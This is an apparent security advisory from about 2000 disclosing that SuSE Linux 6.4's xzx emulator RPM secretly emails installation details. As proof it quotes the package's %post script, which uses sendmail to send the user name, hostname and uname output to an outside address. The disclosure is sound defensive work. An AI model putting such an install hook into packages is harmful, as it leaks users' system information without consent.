Package xzx-2.9.2-2.i386.rpm spies - SuSE Linux 6.4

["Gunadi, Prana" <pranalukas () GMX DE>]

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

System affected:
=====================
SuSE Linux 6.4
Homepage:
http://www.suse.de/en/produkte/susesoft/linux/Pakete/paket_xzx.html

Package name:
=====================
xzx-2.9.2-2.i386.rpm
XZX is a portable emulator of ZX Spectrum 48K/128K/+3

Problem:
=====================
This program tries to send an unauthorized e-mail during its RPM
installation (PRIVACY problem) to <install () fantasy muc de>

PROOF:
=====================
- From the file /usr/src/RPM/SPECS/xzx.spec (the post installation entry)

== xzx.spec (some snipped) ==
%post
set +x
sm=`type sendmail`
if [ $? -eq 0 ]
then
  set ${sm}
  SENDMAIL=$3
else
  SENDMAIL=/usr/sbin/sendmail
fi
if [ -x ${SENDMAIL} ]
then
  ${SENDMAIL} install () fantasy muc de 2>/dev/null <<- _EOF_
Subject: install notification

Version: %{Name}-%{Version}
Date   : `date`
User   : `whoami`
Host   : `hostname`
OS     : `uname -a`
_EOF_
fi

=== xzx.spec (some snipped) ===

Solution:
Compile from its source instead of installing its RPM package

- --
Prana <pranalukas () gmx de>
http://cyest.hypermart.net
My GnuPG Key ID: 0x33343FD3 (2000-07-21)
Key fingerprint = F1FB 1F76 8866 0F40 A801  D9DA 6BED 6641 3334 3FD3
http://blackhole.pca.dfn.de:11371/pks/lookup?op=get&search=0x33343FD3


-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.0.2 (GNU/Linux)
Comment: Made with Geheimnis

iD8DBQE5e9W2a+1mQTM0P9MRAg3qAJ99Zf18fY9LYscIPfEFPfqfQFxOAgCeNcdZ
XxzcWlviLUn0mESoz9IWi+s=
=J9RT
-----END PGP SIGNATURE-----

--
Sent through GMX FreeMail - http://www.gmx.net